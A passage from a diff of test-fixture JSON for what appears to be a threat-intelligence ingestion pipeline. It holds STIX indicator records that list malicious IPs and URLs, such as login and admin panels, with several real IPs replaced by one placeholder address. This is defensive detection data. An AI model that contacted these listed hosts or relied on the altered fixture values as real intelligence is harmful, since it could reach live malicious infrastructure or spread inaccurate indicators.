'162.241.6.97']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.733Z\"}", + "ingested": "2021-12-13T08:38:40.025089500Z", + "original": "{\"created\":\"2020-02-08T14:04:30.733Z\",\"description\":\"TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--7873494f-24fb-42a6-ae17-299b9825e220\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-22\"],\"modified\":\"2020-02-08T14:04:30.733Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.733Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20196,7 +20196,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387923843Z", + "ingested": "2021-12-13T08:38:40.025096700Z", "original": "{\"created\":\"2020-02-08T14:04:30.81Z\",\"description\":\"TS ID: 55298072245; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--14e760f3-eb76-412c-ab7b-8267bd65deb5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-08T14:04:30.81Z\",\"name\":\"mal_url: http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.81Z\"}", "category": "threat", "type": "indicator", @@ -20248,7 +20248,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387930125Z", + "ingested": "2021-12-13T08:38:40.025103900Z", "original": "{\"created\":\"2020-02-08T14:04:30.84Z\",\"description\":\"TS ID: 55298072104; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--8a5aa5ab-e8ec-4641-9cfb-179df3bede39\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-08T14:04:30.84Z\",\"name\":\"mal_url: http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.84Z\"}", "category": "threat", "type": "indicator", @@ -20267,7 +20267,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://45.145.0.14/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-08T14:04:30.927Z", "valid_from": "2020-02-08T14:04:30.927Z", @@ -20291,16 +20291,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://45.145.0.14/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "45.145.0.14", - "full": "http://45.145.0.14/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.387935565Z", - "original": "{\"created\":\"2020-02-08T14:04:30.927Z\",\"description\":\"TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--5bbb8e55-9eb7-4b8a-a7aa-d79c53a0e596\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:04:30.927Z\",\"name\":\"mal_url: http://45.145.0.14/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.145.0.14/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.927Z\"}", + "ingested": "2021-12-13T08:38:40.025111Z", + "original": "{\"created\":\"2020-02-08T14:04:30.927Z\",\"description\":\"TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--5bbb8e55-9eb7-4b8a-a7aa-d79c53a0e596\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:04:30.927Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.927Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20350,7 +20350,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387940654Z", + "ingested": "2021-12-13T08:38:40.025118600Z", "original": "{\"created\":\"2020-02-08T14:04:35.541Z\",\"description\":\"TS ID: 55298071733; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--cd3bea2d-dd64-463e-ae03-2a582c2261f2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-08T14:04:35.541Z\",\"name\":\"mal_url: http://trust-oot.info/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trust-oot.info/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:35.541Z\"}", "category": "threat", "type": "indicator", @@ -20369,7 +20369,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 217.8.117.66", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-08T14:04:35.641Z", "valid_from": "2020-02-08T14:04:35.641Z", @@ -20391,12 +20391,12 @@ "first_seen": "2020-02-08T14:04:35.641Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "217.8.117.66" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.387945534Z", - "original": "{\"created\":\"2020-02-08T14:04:35.641Z\",\"description\":\"TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--543aeaab-e5f0-42bc-afa5-6cd3cc9a26ec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-08T14:04:35.641Z\",\"name\":\"mal_ip: 217.8.117.66\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '217.8.117.66']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:35.641Z\"}", + "ingested": "2021-12-13T08:38:40.025125700Z", + "original": "{\"created\":\"2020-02-08T14:04:35.641Z\",\"description\":\"TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--543aeaab-e5f0-42bc-afa5-6cd3cc9a26ec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-08T14:04:35.641Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:35.641Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20414,7 +20414,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://81.4.100.75/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime", "modified": "2020-02-08T14:04:37.657Z", "valid_from": "2020-02-08T14:04:37.657Z", @@ -20438,16 +20438,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://81.4.100.75/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "81.4.100.75", - "full": "http://81.4.100.75/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.387950192Z", - "original": "{\"created\":\"2020-02-08T14:04:37.657Z\",\"description\":\"TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--d2987902-59e6-4667-b011-f20e93e283d9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:04:37.657Z\",\"name\":\"mal_url: http://81.4.100.75/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://81.4.100.75/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:37.657Z\"}", + "ingested": "2021-12-13T08:38:40.025133Z", + "original": "{\"created\":\"2020-02-08T14:04:37.657Z\",\"description\":\"TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--d2987902-59e6-4667-b011-f20e93e283d9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:04:37.657Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:37.657Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20498,7 +20498,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387954561Z", + "ingested": "2021-12-13T08:38:40.025140200Z", "original": "{\"created\":\"2020-02-08T14:04:41.785Z\",\"description\":\"TS ID: 55298072117; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--093718d8-bb0e-4816-ab4b-c97cb95d5531\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-02-08T14:04:41.785Z\",\"name\":\"mal_url: http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:41.785Z\"}", "category": "threat", "type": "indicator", @@ -20550,7 +20550,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387958889Z", + "ingested": "2021-12-13T08:38:40.025147500Z", "original": "{\"created\":\"2020-02-08T14:04:43.759Z\",\"description\":\"TS ID: 55298071859; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--dfdca2f0-75cc-4e33-9045-e2ba136c0183\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-08T14:04:43.759Z\",\"name\":\"mal_url: http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:43.759Z\"}", "category": "threat", "type": "indicator", @@ -20601,7 +20601,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387963758Z", + "ingested": "2021-12-13T08:38:40.025154600Z", "original": "{\"created\":\"2020-02-08T14:04:43.783Z\",\"description\":\"TS ID: 55298070283; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--0e501865-d0a0-493b-8302-02efe0f2c5d1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-08T14:04:43.783Z\",\"name\":\"mal_url: http://kmfjlool.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kmfjlool.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:43.783Z\"}", "category": "threat", "type": "indicator", @@ -20620,7 +20620,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 147.139.139.206", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime", "modified": "2020-02-09T05:09:33.689Z", "valid_from": "2020-02-09T05:09:33.689Z", @@ -20642,12 +20642,12 @@ "first_seen": "2020-02-09T05:09:33.689Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "147.139.139.206" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.387968206Z", - "original": "{\"created\":\"2020-02-09T05:09:33.689Z\",\"description\":\"TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--91f46249-8fa5-4e88-bb38-0448b08b5448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-09T05:09:33.689Z\",\"name\":\"mal_ip: 147.139.139.206\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '147.139.139.206']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-09T05:09:33.689Z\"}", + "ingested": "2021-12-13T08:38:40.025161800Z", + "original": "{\"created\":\"2020-02-09T05:09:33.689Z\",\"description\":\"TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--91f46249-8fa5-4e88-bb38-0448b08b5448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-09T05:09:33.689Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-09T05:09:33.689Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20697,7 +20697,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387972735Z", + "ingested": "2021-12-13T08:38:40.025166Z", "original": "{\"created\":\"2020-02-10T02:01:30.459Z\",\"description\":\"TS ID: 55303483956; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--07925c70-b345-4aa6-8f40-e19602cf0429\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-10T02:01:30.459Z\",\"name\":\"mal_url: http://pentestblog.xyz/panel/login/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pentestblog.xyz/panel/login/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:01:30.459Z\"}", "category": "threat", "type": "indicator", @@ -20749,7 +20749,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387977814Z", + "ingested": "2021-12-13T08:38:40.025171500Z", "original": "{\"created\":\"2020-02-10T02:01:36.571Z\",\"description\":\"TS ID: 55303483889; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--00195f28-4745-41a3-9710-7e2266b1270e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-10T02:01:36.571Z\",\"name\":\"mal_url: http://f0386817.xsph.ru/32cd6120/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0386817.xsph.ru/32cd6120/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:01:36.571Z\"}", "category": "threat", "type": "indicator", @@ -20800,7 +20800,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387982373Z", + "ingested": "2021-12-13T08:38:40.025177Z", "original": "{\"created\":\"2020-02-10T02:01:36.621Z\",\"description\":\"TS ID: 55303483880; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--eae0ef0b-3b77-401b-8835-4ad9cb97171d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-10T02:01:36.621Z\",\"name\":\"mal_url: http://f0395086.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0395086.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:01:36.621Z\"}", "category": "threat", "type": "indicator", @@ -20819,7 +20819,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://45.76.237.80/panel/admin.php", + "name": "mal_url: http://89.160.20.156/panel/admin.php", "description": "TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime", "modified": "2020-02-10T02:02:06.427Z", "valid_from": "2020-02-10T02:02:06.427Z", @@ -20844,16 +20844,16 @@ "url": { "path": "/panel/admin.php", "extension": "php", - "original": "http://45.76.237.80/panel/admin.php", + "original": "http://89.160.20.156/panel/admin.php", "scheme": "http", - "domain": "45.76.237.80", - "full": "http://45.76.237.80/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.387987052Z", - "original": "{\"created\":\"2020-02-10T02:02:06.427Z\",\"description\":\"TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--05d25a1d-cf55-4b36-93ee-dbf618980b2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-44\"],\"modified\":\"2020-02-10T02:02:06.427Z\",\"name\":\"mal_url: http://45.76.237.80/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.76.237.80/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:06.427Z\"}", + "ingested": "2021-12-13T08:38:40.025183400Z", + "original": "{\"created\":\"2020-02-10T02:02:06.427Z\",\"description\":\"TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--05d25a1d-cf55-4b36-93ee-dbf618980b2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-44\"],\"modified\":\"2020-02-10T02:02:06.427Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:06.427Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20904,7 +20904,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387991790Z", + "ingested": "2021-12-13T08:38:40.025187300Z", "original": "{\"created\":\"2020-02-10T02:02:14.887Z\",\"description\":\"TS ID: 55303483942; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--9af2b6ee-aec5-481a-8e93-2a7153fcf05e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-10T02:02:14.887Z\",\"name\":\"mal_url: http://worldatdoor.in/wire/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/wire/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:14.887Z\"}", "category": "threat", "type": "indicator", @@ -20956,7 +20956,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.387998313Z", + "ingested": "2021-12-13T08:38:40.025192600Z", "original": "{\"created\":\"2020-02-10T02:02:16.263Z\",\"description\":\"TS ID: 55303483899; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--1641ace0-37a5-4364-8400-e422b5cdbcec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-10T02:02:16.263Z\",\"name\":\"mal_url: http://wwe23pro.myjino.ru/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wwe23pro.myjino.ru/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:16.263Z\"}", "category": "threat", "type": "indicator", @@ -20975,7 +20975,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 2.59.117.6", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-10T02:02:35.848Z", "valid_from": "2020-02-10T02:02:35.848Z", @@ -20997,12 +20997,12 @@ "first_seen": "2020-02-10T02:02:35.848Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "2.59.117.6" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388002911Z", - "original": "{\"created\":\"2020-02-10T02:02:35.848Z\",\"description\":\"TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--3e09e501-0b80-4de6-b5a9-1d30b5687a24\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-44\"],\"modified\":\"2020-02-10T02:02:35.848Z\",\"name\":\"mal_ip: 2.59.117.6\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '2.59.117.6']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:35.848Z\"}", + "ingested": "2021-12-13T08:38:40.025200200Z", + "original": "{\"created\":\"2020-02-10T02:02:35.848Z\",\"description\":\"TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--3e09e501-0b80-4de6-b5a9-1d30b5687a24\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-44\"],\"modified\":\"2020-02-10T02:02:35.848Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:35.848Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21052,7 +21052,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388007470Z", + "ingested": "2021-12-13T08:38:40.025204500Z", "original": "{\"created\":\"2020-02-10T02:02:45.419Z\",\"description\":\"TS ID: 55303483940; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--85ab9568-e7f5-40c6-935d-8bdbe263970c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-02-10T02:02:45.419Z\",\"name\":\"mal_url: http://garex.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://garex.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:45.419Z\"}", "category": "threat", "type": "indicator", @@ -21104,7 +21104,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388012770Z", + "ingested": "2021-12-13T08:38:40.025209100Z", "original": "{\"created\":\"2020-02-10T02:02:47.096Z\",\"description\":\"TS ID: 55303483952; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--05509090-9cd9-43b0-892c-02318134a893\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-10T02:02:47.096Z\",\"name\":\"mal_url: http://jerichoconstructioncompany.com/wps/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jerichoconstructioncompany.com/wps/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:47.096Z\"}", "category": "threat", "type": "indicator", @@ -21155,7 +21155,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388017218Z", + "ingested": "2021-12-13T08:38:40.025212700Z", "original": "{\"created\":\"2020-02-10T02:02:55.786Z\",\"description\":\"TS ID: 55303483873; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--c884bffa-1248-483b-bdf8-dada05340ea4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-10T02:02:55.786Z\",\"name\":\"mal_url: http://f0396079.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396079.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:55.786Z\"}", "category": "threat", "type": "indicator", @@ -21207,7 +21207,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388021406Z", + "ingested": "2021-12-13T08:38:40.025217800Z", "original": "{\"created\":\"2020-02-10T02:03:03.62Z\",\"description\":\"TS ID: 55303483931; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--14bb6b9e-e4f9-4059-a1a0-f06481441883\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-10T02:03:03.62Z\",\"name\":\"mal_url: http://impulsefittness.info/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://impulsefittness.info/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:03:03.62Z\"}", "category": "threat", "type": "indicator", @@ -21259,7 +21259,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388025644Z", + "ingested": "2021-12-13T08:38:40.025223800Z", "original": "{\"created\":\"2020-02-10T02:03:53.711Z\",\"description\":\"TS ID: 55303483865; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--92bdd0d7-0d15-4bcb-bf37-6aec2b0114b8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-10T02:03:53.711Z\",\"name\":\"mal_url: http://pentestblog.xyz/csc/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pentestblog.xyz/csc/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:03:53.711Z\"}", "category": "threat", "type": "indicator", @@ -21310,7 +21310,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388029852Z", + "ingested": "2021-12-13T08:38:40.025230100Z", "original": "{\"created\":\"2020-02-10T02:03:57.56Z\",\"description\":\"TS ID: 55303483938; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--eb0c4603-82ac-4283-bda3-ce9d276bc002\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-10T02:03:57.56Z\",\"name\":\"mal_url: http://pom4ekk.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pom4ekk.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:03:57.56Z\"}", "category": "threat", "type": "indicator", @@ -21361,7 +21361,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388034410Z", + "ingested": "2021-12-13T08:38:40.025237400Z", "original": "{\"created\":\"2020-02-10T02:04:24.419Z\",\"description\":\"TS ID: 55303483870; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: 